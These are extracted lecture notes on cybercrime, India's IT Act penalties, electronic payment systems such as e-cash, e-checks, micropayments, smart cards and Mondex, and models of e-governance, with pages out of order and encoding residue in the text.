3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
